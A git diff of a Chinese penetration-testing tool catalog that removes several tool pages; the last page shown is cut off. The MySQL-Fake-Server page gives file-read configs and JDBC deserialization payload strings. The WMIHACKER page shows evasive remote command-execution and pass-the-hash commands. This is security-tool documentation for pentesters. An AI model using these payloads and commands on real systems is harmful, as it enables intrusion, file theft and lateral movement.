-- 删除敏感文件(详细说明情况请看文档里的公告一栏)
-
 #### [v2.0.6] - 2021-08-17
-
 **核心**  
 - 优化内部代码  
 - 删除软件自启更新功能  
diff --git a/detail/MySQL-Fake-Server.md b/detail/MySQL-Fake-Server.md
deleted file mode 100644
index 7552b126f..000000000
--- a/detail/MySQL-Fake-Server.md
+++ /dev/null
@@ -1,137 +0,0 @@
-## MySQL-Fake-Server <https://github.com/fnmsd/MySQL_Fake_Server>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-fnmsd-orange)
-![GitHub stars](https://img.shields.io/github/stars/fnmsd/MySQL_Fake_Server.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-![Time](https://img.shields.io/badge/Join-20211122-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-用于渗透测试过程中的假MySQL服务器，纯原生python3实现，不依赖其它包。
-
-修改自项目 <https://github.com/waldiTM/python-mysqlproto>
-
-## 用途
-
-1. MySQL服务端读取客户端文件漏洞利用
-2. MySQL JDBC客户端Java反序列化漏洞利用
-
-## 说明
-1. 需要python3环境，无任何其它依赖。
-2. 运行：`python server.py`
-3. 需要[ysoserial](https://github.com/frohoff/ysoserial)才能用反序列化功能，支持`ServerStatusDiffInterceptor`和`detectCustomCollations`两种方式。
-4. MySQL的用户名支持冒号、斜杠等特殊符号，但是能否使用还需看具体客户端环境。
-5. 根据 **登录用户名** 返回文件读取利用报文、反序列化利用报文。
-6. **推荐用法：** config.json中预置了一部分配置信息，可以自己修改添加指定用户名对应的读取文件和yso参数，详细看下面的说明
-
-## 测试环境：
-1. jdk1.8.20+mysql-connector-java 8.0.14/5.1.22(Windows下反序列化（JRE8u20）、文件读取)
-2. PHPMyAdmin(Windows+Linux文件读取，可以使用相对路径读取php文件内容)
-3. Navicat 12(Windows下文件读取，需要切换到mysql_clear_password认证插件)
-
-## 使用方法
-默认的config.json:
-
-```json
-{
-     "config":{
-        "ysoserialPath":"ysoserial-0.0.6-SNAPSHOT-all.jar", //YsoSerial位置
-        "javaBinPath":"java",//java运行命令位置
-        "fileOutputDir":"./fileOutput/",//读取文件的保存目录
-        "displayFileContentOnScreen":true,//是否输出文件内容预览到控制台
-        "saveToFile":true//是否保存文件
-    },
-//文件读取参数
-    "fileread":{
-        "win_ini":"c:\\windows\\win.ini",//key为设定的用户名,value为要读取的文件路径
-        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
-        "win":"c:\\windows\\",
-        "linux_passwd":"/etc/passwd",
-        "linux_hosts":"/etc/hosts",
-        "index_php":"index.php",
-        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]//未知用户名情况下随机选择文件读取
-
-    },
-//ysoserial参数
-    "yso":{
-        "Jdk7u21":["Jdk7u21","calc"]//key为设定的用户名,value为ysoserial参数的参数
-    }
-}
-```
-
-1. 文件读取：
-
-    - 可以在config.json中fileread节中预定义好要读取的文件(比如win_ini用户名读取win.ini文件)
-    - 可以用fileread_开头的用户名(例如使用用户名fileread\_/etc/passwd来读取/etc/passwd文件)
-
-2. 反序列化
-    - 可在config.json中yso节预定义好yso payload的生成参数(比如Jdk7u21用户名返回Jdk7u21执行计算器的gadget)
-
-    - 可以用yso_开头的用户名，格式yso\_payload类型\_命令（例如jdk7u21调用calc就使用用户名yso\_Jdk7u21\_calc）
-
-      jdbc连接串示例：
-      - `jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_Jdk7u21_calc`
-      - `jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_URLDNS_http://yourdns.log.addr/`
-
-3. 关于认证：默认认证插件一般使用**mysql_native_password**,但是由于协议实现的问题，navicat下会连接失败，此时在使用的用户名后追加 **_clear** 即可切换为mysql_clear_password,navicat连接成功,读取到文件。
-
-    - **例如：** fileread\_/etc/passwd_clear
-
-## JDBC连接串整理
-
-写分析的时候整理了一下：<https://www.anquanke.com/post/id/203086>
-用户名请参考上面的说明进行修改。
-
-### ServerStatusDiffInterceptor触发
-
-- **8.x:** `jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc`
-
-- **6.x(属性名不同):** `jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc`
-
-- **5.1.11及以上的5.x版本（包名没有了cj）:**` jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc`
-
-- **5.1.10及以下的5.1.X版本：** 同上，但是需要连接后执行查询。
-
-- **5.0.x:** 还没有`ServerStatusDiffInterceptor`这个东西┓( ´∀` )┏
-
-### detectCustomCollations触发：
-
-- **5.1.41及以上:** 不可用
-
-- **5.1.29-5.1.40:** `jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc`
-
-- **5.1.28-5.1.19：** `jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc`
-
-- **5.1.18以下的5.1.x版本：** 不可用
-
-- **5.0.x版本不可用** 
-
-## 效果
-
-Navicat文件读取（用户名使用win_ini_clear）
-
-![image-20200414150112426](https://github.com/fnmsd/MySQL_Fake_Server/raw/master/README.assets/image-20200414150112426.png)
-
-JDK 1.8.20+mysql-connector-java 8.0.14反序列化，使用用户名：yso_JRE8u20_calc
-
-![image-20200414150417471](https://github.com/fnmsd/MySQL_Fake_Server/raw/master/README.assets/image-20200414150417471.png)
-
-## 踩过的坑
-
-1. SHOW VARIABLES 相关
-   - 会读取两列，所以需要返回两列，否则会报错。
-   - JDBC连接的时候回通过调用`SHOW VARIABLES`获取服务器变量，其中最重要的是两个时区变量`system_time_zone`和`time_zone`，在getObject过程，会调用到时区相关信息，没有这两个会直接报错
-2. jdbc的Blob判定条件除了字段类型为blob，还要求字段声明的org_table字段不为空，flags大于128，否则会被当做text进行解析。（com.mysql.cj.protocol.a.NativeProtocol的findMysqlType方法）
-3. 原python-mysqlproto中的序列检测需要去掉，否则会出错（这个应该是哪里处理有问题导致了序号重置）。
-4. `SHOW SESSION STATUS`和`SHOW COLLATION`的公用列是第二列
-5. mysql java connector 5.x的环境下，需要返回的server版本大于等于5.0.0才会走到`Util.resultSetToMap`进入getObject
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/OpenStar.md b/detail/OpenStar.md
index 1d10d6516..8b138dcd7 100644
--- a/detail/OpenStar.md
+++ b/detail/OpenStar.md
@@ -772,6 +772,8 @@ OpenStar测试服务器：
   [22]: https://github.com/starjun/openstar/wiki/12-post_Mod
   [23]: https://github.com/starjun/openstar/wiki/13-network_Mod
   [24]: https://github.com/starjun/openstar/wiki/14-replace_Mod
+  [25]: https://github.com/knownsec/404StarLink-Project/raw/master/logo.png "404.png"
+  [26]: https://github.com/knownsec/404StarLink2.0-Galaxy
   [27]: https://github.com/starjun/openstar/raw/master/doc/xq.jpg "xq.jpg"
 
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
diff --git a/detail/Platypus.md b/detail/Platypus.md
index 394c711b9..3c54d1221 100644
--- a/detail/Platypus.md
+++ b/detail/Platypus.md
@@ -206,7 +206,6 @@ First use `Jump` to select a client, then type `PTY`, then type `Interact` to dr
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2021-11-19 发布文章[《Platypus：支持多会话的交互式反向 Shell 管理器》](https://mp.weixin.qq.com/s/9UFm1XQiWMUeA7pG93FfeQ)
 
 ## 最近更新
 
diff --git a/detail/Pocassist.md b/detail/Pocassist.md
index f257519f1..67573a5ea 100644
--- a/detail/Pocassist.md
+++ b/detail/Pocassist.md
@@ -103,7 +103,6 @@ http://127.0.0.1:1231
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2021-11-17 发布文章[《pocassist : 全新的开源在线 poc 测试框架》](https://mp.weixin.qq.com/s/y0FrNX08yULCqJXmUI6FSg)
 
 ## 最近更新
 
diff --git a/detail/PortForward.md b/detail/PortForward.md
deleted file mode 100644
index 0c7fc8d88..000000000
--- a/detail/PortForward.md
+++ /dev/null
@@ -1,155 +0,0 @@
-## PortForward <https://github.com/knownsec/PortForward>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-knownsec404-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/PortForward.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.5.0-red)
-![Time](https://img.shields.io/badge/Join-20201022-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-## 0x00 前言
-`PortForward` 是使用 Golang 进行开发的端口转发工具，解决在某些场景下 `内外网无法互通`的问题。
-
-`PortForward` 的功能如下：
-
-	1. 支持 tcp/udp 协议层的端口转发
-	2. 支持级联
-	3. 支持正向/反向连接模式
-	4. 支持多通道
-	5. 支持 ipv6
-
-本文对 `PortForward` 进行了详细的介绍。
-
-目录：
-
-1. 使用说明
-2. 工作场景
-3. 源码结构
-4. 逻辑结构
-5. 端口转发的实现
-6. udp的knock报文
-7. udp的超时设置
-8. listen-listen的超时设置
-9. 多通路的实现
-10. issue
-11. contributions
-
-## 0x01 使用说明
-**1.使用**  
-
-	Usage:
-	  ./portforward [proto] [sock1] [sock2]
-	Option:
-	  proto      the port forward with protocol(tcp/udp)
-	  sock       format: [method:address:port]
-	  method     the sock mode(listen/conn)
-	Example:
-	  tcp conn:192.168.1.1:3389 conn:192.168.1.10:23333
-	  udp listen:192.168.1.3:5353 conn:8.8.8.8:53
-	  tcp listen:[fe80::1%lo0]:8888 conn:[fe80::1%lo0]:7777
-
-	version: 0.5.0(build-20201022)
-
-**2.编译**  
-
-	Golang 1.12及以上
-	GO111MODULE=on
-	
-	git clone https://github.com/knownsec/Portforward.git
-	./build.sh
-
-
-## 0x02 工作场景
-这里列举了一些 `PortForward` 的工作场景，如下：
-
-**2.1 简单模式**  
-<div align="center">
-<img src="https://github.com/knownsec/PortForward/raw/master/Images/simple_forward.png" width="500">
-</br>[图1.简单转发模式]
-</div>
-
-**2.2 受限主机转发**  
-<div align="center">
-<img src="https://github.com/knownsec/PortForward/raw/master/Images/restricted_forward.png" width="500">
-</br>[图2.受限主机转发模式图]
-</div> 
-
-**2.3 级联端口转发**  
-<div align="center">
-<img src="https://github.com/knownsec/PortForward/raw/master/Images/mutil_forward.png" width="500">
-</br>[图3.级联端口转发]
-</div> 
-
-
-## 0x03 源码结构
-
-	.
-	├── CHANGELOG
-	├── Images        // images resource
-	├── README.md
-	├── build.sh      // compile script
-	├── forward.go    // portforward main logic
-	├── go.mod
-	├── log.go        // log module
-	├── main.go       // main, parse arguments
-	├── tcp.go        // tcp layer
-	└── udp.go        // udp layer
-
-
-## 0x04 逻辑结构
-`PortForward` 支持 `TCP` , `UDP` 协议层的端口转发，代码抽象后逻辑结构框架如下：
-<div align="center">
-<img src="https://github.com/knownsec/PortForward/raw/master/Images/portforward_framework.png" width="500">
-</br>[图4.整体框架]
-</div>
-
-
-## 0x05 端口转发的实现
-端口转发程序作为网络传输的中间人，无非就是将两端的 socket 对象进行联通，数据就可以通过这条「链路」进行传输了。
-
-按照这样的思路，我们从需求开始分析和抽象，可以这么认为：无论是作为 `tcp` 还是 `udp` 运行，无论是作为 `connect` 还是 `listen` 运行，最终都将获得两个 socket，其中一个连向原服务，另一个与客户端连接；最终将这两端的 socket 联通即可实现端口转发。
-
-在 Golang 中我们采用了 `io.Copy()` 来联通两个 socket，但是 `io.Copy` 必须要求对象实现了 `io.Reader/io.Writer` 接口，`tcp` 的 socket 可以直接支持，而 `udp` 的 socket 需要我们进行封装。
-
-
-## 0x06 udp的knock报文
-在 `udp` 的 `connect` 模式下，我们在连接服务器成功后，立即发送了一个 `knock` 报文，如下：
-
-	conn, err := net.DialTimeout("udp", ...
-	_, err = conn.Write([]byte("\x00"))
-
-其作用是通知远程 `udp` 服务器我们已经连上了(`udp` 创建连接后，仅在本地操作系统层进行了注册，只有当发送一个报文到对端后，远程服务器才能感知到新连接)，当我们在 `udp` 的 `conn-conn` 模式下运行时，这个报文是必须的。
-
-
-## 0x07 udp的超时设置
-在 `udp` 的实现中，我们为所有的 `udp` 连接 socket 对象都设置了超时时间(`tcp` 中不需要)，这是因为在 `udp` 中，socket 对象无法感知对端退出，如果不设置超时时间，将会一直在 `conn.Read()` 阻塞下去。
-
-我们设置了 `udp` 超时时间为 60 秒，当 60 秒无数据传输，本次建立的虚拟通信链路将销毁，端口转发程序将重新创建新的通信链路。
-
-
-## 0x08 listen-listen的超时设置
-对于 `listen-listen` 模式，需要等待两端的客户端都连上端口转发程序后，才能将两个 socket 进行联通。
-
-为此我们在此处设置了 120 秒的超时时间，也就是说当其中一端有客户端连接后，另一端在 120 秒内没有连接，我们就销毁这个未成功建立的通信链路；用户重新连接即可。
-
->如果没有这个超时，可能某些场景遗留了某个连接，将造成后续的通信链路错位。
-
-
-## 0x09 多通路的实现
-多通路可以支持同时发起多个连接，这里我们以 `tcp` 作为例子来说明。为了处理这种情况，我们的处理方式是：
-
-1. `listen-conn`: 每当 listen 服务器接收到新连接后，与远端创建新的连接，并将两个 socket 进行联通。
-2. `listen-listen`: (好像没有实际场景)两端的 listen 服务器接收到新连接后，将两个 socket 进行联通。
-3. `conn-conn`: 创建 sock1 的连接，当 sock1 端收到数据，创建与 sock2 的连接，将两个 socket 进行联通；随后继续创建 sock1 连接(预留)。
-
->我们在 `udp` 中也加入了多通路的支持，和 `tcp` 基本类似，但由于 `udp` 是无连接的，我们不能像 `tcp` 直接联通两个 socket 对象。我们在 `udp listen` 服务器中维护了一个临时表，使用 `ip:port` 作为标志，以描述各个通信链路的联通情况，依据此进行流量的分发。
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/Stowaway.md b/detail/Stowaway.md
index 18ce0435d..2450a8c2a 100644
--- a/detail/Stowaway.md
+++ b/detail/Stowaway.md
@@ -3,7 +3,7 @@
 ![Language](https://img.shields.io/badge/Language-Golang-blue)
 ![Author](https://img.shields.io/badge/Author-ph4ntonn-orange)
 ![GitHub stars](https://img.shields.io/github/stars/ph4ntonn/Stowaway.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.1-red)
+![Version](https://img.shields.io/badge/Version-V2.0.0-red)
 ![Time](https://img.shields.io/badge/Join-20210702-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
@@ -256,16 +256,7 @@ agent之间也与上面情况一致
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2021-11-16 发布文章[《Stowaway : 专为渗透测试工作者制作的多级代理工具》](https://mp.weixin.qq.com/s/L7Ikxd_Nql8SkezY4l0blQ)
 
 ## 最近更新
 
-#### [v2.1] - 2022-04-08
-
-**更新**  
-- 修复关闭短连接时的数据丢失错误  
-- 添加 gzip 功能  
-- 优化关键代码  
-- 修复一些 bugs
-
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/Viper.md b/detail/Viper.md
index 5f91b3115..ef5916edc 100644
--- a/detail/Viper.md
+++ b/detail/Viper.md
@@ -3,7 +3,7 @@
 ![Language](https://img.shields.io/badge/Language-JS/Python-blue)
 ![Author](https://img.shields.io/badge/Author-FunnyWolf-orange)
 ![GitHub stars](https://img.shields.io/github/stars/FunnyWolf/Viper.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V20230827-red)
+![Version](https://img.shields.io/badge/Version-V1.5.5-red)
 ![Time](https://img.shields.io/badge/Join-20210323-green)
 <!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
 
@@ -75,75 +75,54 @@
 <!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
 ## 项目相关
 
-- 2023-02-14 发布演示视频[404星链计划开源安全工具演示——Viper](https://www.bilibili.com/video/BV1zv4y1s7xv)
 
 ## 最近更新
 
-#### [v20230827] - 2023-08-28
-
+#### [v1.5.6] - 2021-10-31
+**新功能**  
+- 新增监听防火墙功能  
+- 新增直接windows系统调用规避技术模块  
 **优化**  
-- 反溯源脚本nobody.sh可以快速使用初始nginx配置  
-- 合并metasploit-framework 6.3.32版本  
-- Viper后续使用构建时间作为版本号  
-
+- reverse_http(s)在网络断开时超时时间从21秒(Windows默认)更新为3秒  
+- 当前Session默认用不过期,不会自动退出  
+- 合并metasploit-framework 6.1.13版本  
 **Bugfix**  
-- 修复Session心跳显示999,msfrpc状态正常,界面显示渗透服务心跳异常  
-- 修复session文件下载报错的问题  
-- 修复多次重启后会重复添加缓存的监听的问题
-
-#### [v1.6.4] - 2023-08-21
+- 修复sessionExpirationTimeout为0时reverse_tcp无法连接问题  
+- 修复UI界面无法获取默认lhost参数问题
 
+#### [v1.5.5] - 2021-10-24
 **新功能**  
-- 新增判断Session是否运行在容器中模块  
-
+- 新增`CVE-2021-40449提权`模块  
+- 新增WebUI一键下载Viper所有日志  
 **优化**  
-- session通过鼠标提示展示英文的地理位置信息  
-- Viper通过CI自动更新Geolite数据库  
-- Viper当前通过CI自动构建  
-- 优化模块运行部分前端提示信息  
-- 优化viperpython日志格式  
-- 提高运行信息执行速度  
-- 渗透服务异常时日志更详细说明异常类型  
-- 合并metasploit-framework 6.3.31版本  
-
+- 合并metasploit-framework 6.1.12版本  
 **Bugfix**  
-- 修复Session心跳显示999,msfrpc状态正常,界面显示渗透服务心跳异常  
-- 修复session下载文件时会偶发性的下载了1m中断  
-- 修复已经上线的session界面未显示  
-- 修复日志逻辑问题
-
-#### [v1.6.3] - 2023-08-12
+- 修复Socks代理关闭后端口占用问题
 
+#### [v1.5.4] - 2021-10-17
+**新功能**  
+- 新增MS17-010利用(CSharp)模块  
 **优化**  
-- 调整vipermsf及viperpython日志级别及格式,便于定位问题  
-- 关闭vipermsf的cpulimit  
-- 新增vipermsf心跳异常提示  
-- 更新沙箱IP列表  
-- 优化网络拓扑动态效果  
-- 合并metasploit-framework 6.3.30版本  
-
+- 合并metasploit-framework 6.1.11版本  
 **Bugfix**  
-- 修复session下载文件时会偶发性的下载了1m中断  
-- 修复thin的pid文件未清除导致重启msf后台服务无法启动
-
-#### [v1.6.2] - 2023-08-02
+- 修复重复添加reverse_http(s)监听时无法上线Session问题
 
+#### [v1.5.3] - 2021-10-10
 **优化**  
-- 优化Session Timeout默认值,断线可自动切换传输协议  
-- reverse_http监听不再返回404页面,直接关闭连接  
-- 优化网络拓扑,根据载荷类型确认方向并动态显示当前存活的连接  
-- 合并metasploit-framework 6.3.28版本  
-
-**Bugfix**  
-- Socks5代理在存在连接时无法正确关闭问题
-
-#### [v1.6.1] - 2023-07-09
+- 登录页面多语言支持
+  - 优化 msfconsole 用户体验  
+- 合并metasploit-framework 6.1.10版本
 
+#### [v1.5.1] - 2021-09-26
+**新功能**  
+- 新增`获取互联网出口IP`模块  
+- session进程列表新增搜索过滤  
 **优化**  
-- 合并metasploit-framework 6.3.25版本  
-
+- 杀毒软件显示支持英文版  
+- 优化内网扫描模块输出格式  
+- 优化`运行模块`功能的性能及UI  
+- 合并metasploit-framework 6.1.8版本  
 **Bugfix**  
-- 修复NAT网络Linux主机(VPS)IP显示为::1问题  
-- 修复NAT网络Linux主机(VPS)上线生成多个主机问题
+- 修复不显示杀毒软件名称问题
 
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/WMIHACKER.md b/detail/WMIHACKER.md
deleted file mode 100644
index 00f1d5de4..000000000
--- a/detail/WMIHACKER.md
+++ /dev/null
@@ -1,84 +0,0 @@
-## WMIHACKER <https://github.com/rootclay/WMIHACKER>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-VBScript-blue)
-![Author](https://img.shields.io/badge/Author-rootclay-orange)
-![GitHub stars](https://img.shields.io/github/stars/rootclay/WMIHACKER.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-![Time](https://img.shields.io/badge/Join-20221117-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-> 免责声明：本项目涉及的技术仅供安全学习与研究防御用途，禁止非法使用！
-
-免杀横向移动命令执行测试工具(无需445端口)
-
-介绍：免杀横向渗透远程命令执行，常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令，这些方式都已经被杀软100%拦截，通过改造出WMIHACKER免杀横向移动测试工具。(无需445端口)
-
-主要功能：1、命令执行；2、文件上传；3、文件下载；4、PTH使用
-
-## 使用
-合并[Issue 1](https://github.com/360-Linton-Lab/WMIHACKER/issues/1)里PTH的使用方法：
-
-```vbscript
-第54-58行代码：
-
-if user = "-" And pass = "-" Then
-set objWMIService = objLocator.connectserver(host,"root/cimv2")
-Set SubobjSWbemServices = objLocator.ConnectServer(host, "root\subscription")
-Set regWMIService = objLocator.ConnectServer(host, "root\default")
-
-用户名和密码填“-”，结合mimikatz的PTH就可以进行WMI的PTH了。
-```
-
-```
-C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs
-
-__          ____  __ _____   _    _          _____ _  ________ _____
-\ \        / /  \/  |_   _| | |  | |   /\   / ____| |/ /  ____|  __ \
- \ \  /\  / /| \  / | | |   | |__| |  /  \ | |    | ' /| |__  | |__) |
-  \ \/  \/ / | |\/| | | |   |  __  | / /\ \| |    |  < |  __| |  _  /
-   \  /\  /  | |  | |_| |_  | |  | |/ ____ \ |____| . \| |____| | \ \
-    \/  \/   |_|  |_|_____| |_|  |_/_/    \_\_____|_|\_\______|_|  \_\
-                              v0.6beta       By. Xiangshan@360RedTeam
-Usage:
-        WMIHACKER.vbs  /cmd  host  user  pass  command GETRES?
-
-        WMIHACKER.vbs  /shell  host  user  pass
-
-        WMIHACKER.vbs  /upload  host  user  pass  localpath remotepath
-
-        WMIHACKER.vbs  /download  host  user  pass  localpath remotepath
-
-          /cmd          single command mode
-          host          hostname or IP address
-          GETRES?       Res Need Or Not, Use 1 Or 0
-          command       the command to run on remote host
-```
-
-有命令回显执行方式
-
-`> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1`
-
-无命令回显
-
-`> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0`
-
-模拟shell模式
-
-`> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!" `
-
-文件上传-复制本机calc.exe到远程主机c:\calc.exe
-
-`> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"`
-
-文件下载-下载远程主机calc.exe到本地c:\calc.exe
-
-`> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe" `
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/ZoomEye-Python.md b/detail/ZoomEye-Python.md
deleted file mode 100644
index 3d0f11050..000000000
--- a/detail/ZoomEye-Python.md
+++ /dev/null
@@ -1,620 +0,0 @@
-## ZoomEye-Python <https://github.com/knownsec/ZoomEye-python>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-Knownsec404-orange)
-![GitHub stars](https://img.shields.io/github/stars/knownsec/ZoomEye-python.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V2.2.0-red)
-![Time](https://img.shields.io/badge/Join-20200821-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-`ZoomEye` 是一款网络空间搜索引擎，用户可以使用浏览器方式 <https://www.zoomeye.org> 搜索网络设备。
-
-`ZoomEye-python` 是一款基于 `ZoomEye API` 开发的 Python 库，提供了 `ZoomEye` 命令行模式，同时也可以作为 `SDK` 集成到其他工具中。该库可以让技术人员更便捷地**搜索**、**筛选**、**导出** `ZoomEye` 的数据。
-
-### 0x01 安装步骤
-可直接从 `pypi` 进行安装：
-
-	pip3 install zoomeye
-
-也可以通过 `github` 进行安装：
-
-	pip3 install git+https://github.com/knownsec/ZoomEye-python.git
-
-
-### 0x02 使用cli
-在成功安装 `ZoomEye-python` 后，可以直接使用 `zoomeye` 命令，如下：
-
-```
-$ zoomeye -h
-usage: zoomeye [-h] [-v] {info,search,init,ip,history,clear} ...
-
-positional arguments:
-  {info,search,init,ip,history,clear}
-    info                Show ZoomEye account info
-    search              Search the ZoomEye database
-    init                Initialize the token for ZoomEye-python
-    ip                  Query IP information
-    history             Query device history
-    clear               Manually clear the cache and user information
-
-optional arguments:
-  -h, --help            show this help message and exit
-  -v, --version         show program's version number and exit
-
-```
-
-#### 1.初始化token
-在使用 `ZoomEye-python cli` 前需要先初始化用户 `token`，该凭证用于验证用户身份以便从 `ZoomEye` 查询数据；我们提供了两种认证方式：
-
-	1.username/password
-	2.APIKEY (推荐)
-
-可以通过 `zoomeye init -h` 查看帮助，下面通过 `APIKEY` 来进行演示：
-
-```
-$ zoomeye init -apikey "01234567-acbd-00000-1111-22222222222"
-successfully initialized
-Role: developer
-Quota: 10000
-```
-
-用户可以通过登陆 `ZoomEye` 在个人信息中(<https://www.zoomeye.org/profile>) 获取 `APIKEY`；`APIKEY` 不会过期，用户可根据需求在个人信息中进行重置。
-
-除此之外，我们还提供了 `username/password` 的初始化方式，通过这种方式认证后会返回 `JWT-token`，具有一定的时效性，失效后需要用户重新登陆。
-
-#### 2.查询配额
-用户可以通过 `info` 命令查询个人信息以及数据配额，如下：
-
-```
-$ zoomeye info
-user_info: {
-    "email": "",  # 用户邮箱
-    "name": "",  # 用户名
-    "nick_name": "",  # 昵称
-    "api_key": "",  # api_key
-    "role": "",  # 服务级别
-    "phone", "",  # 用户注册手机号
-    "expired_at": ""  # 服务期限
-}
-quota: {
-    "remain_free_quota": "",  # 本月剩余免费额度
-    "remain_pay_quota": "",  # 本月剩余支付额度
-    "remain_total_quota": ""  # 截止到服务日期剩余总额度
-}
-```
-
-#### 3.搜索
-搜索是 `ZoomEye-python` 最核心的功能，通过 `search` 命令进行使用。`search` 命令需要指定搜索关键词(`dork`)，下面我们进行简单的搜索：
-
-```
-$ zoomeye search "telnet" -num 1
-ip:port       service  country  app                 banner                        
-222.*.*.*:23  telnet   Japan    Pocket CMD telnetd  \xff\xfb\x01\xff\xfb\x03\xff\x...
-
-total: 1/58277850
-```
-
-使用 `search` 命令和使用浏览器在 `ZoomEye` 进行搜索一样简单，在默认情况下我们显示了较为重要的 5 个字段，用户可以使用这些数据了解目标信息：
-
-	1.ip:port  ip地址和端口
-	2.service  该端口开放的服务
-	3.country  该ip地址所属国家
-	4.app      识别出的应用类型
-	5.banner   该端口的特征响应报文
-
-在以上演示中，使用 `-num` 参数指定了显示的数量，除此之外，`search` 还支持以下参数(`zoomeye search -h`)，以便用户对数据进行处理，我们将在下文进行说明和演示：
-
-	-num     设置显示/搜索的数量，支持 all
-	-count   查询该 dork 在 ZoomEye 数据库的总量
-	-facet   查询该 dork 全量数据的分布情况
-	-stat    统计数据结果集的分布情况
-	-filter  查询数据结果集中某个字段的详情，或根据内容进行筛选
-	-save    可按照筛选条件将结果集进行导出
-	-force	 忽略本地缓存文件，直接从 ZoomEye 获取数据
-	-type    指定搜索源，host 或 web
-
-#### 4.数据数量
-通过 `-num` 参数可以指定我们搜索和显示的数量，指定的数目即消耗的配额数量。而通过 `-count` 参数可以查询该 `dork` 在 ZoomEye 数据库的总量，如下：
-
-```
-$ zoomeye search "telnet" -count
-56903258
-```
-
->需要注意一点，`-num` 参数消耗的配额为 20 的整数倍，这是因为 `ZoomEye API` 单次查询的最小数量为 20 条。
-
-#### 5.数据聚合
-我们可以通过 `-facet` 和 `-stat` 进行数据的聚合统计，使用 `-facet` 可以查询该 dork 全量数据的聚合情况(由 `ZoomEye` 聚合统计后通过 `API` 获取)，而 `-stat` 可以对查询到的结果集进行聚合统计。两个命令支持的聚合字段包括：
-    
-    # host search 
-    app      按应用类型进行统计
-    device   按设备类型进行统计
-    service  按照服务类型进行统计
-    os       按照操作系统类型进行统计
-    port     按照端口进行统计
-    country  按照国家进行统计
-    city     按照城市进行统计
-    
-    # web search
-    webapp      按照 Web 应用进行统计
-    component   按照 Web 容器进行统计
-    framework   按照 Web 框架进行统计
-    server      按照 Web 服务器进行统计
-    waf         按照 Web 防火墙(WAF)进行统计
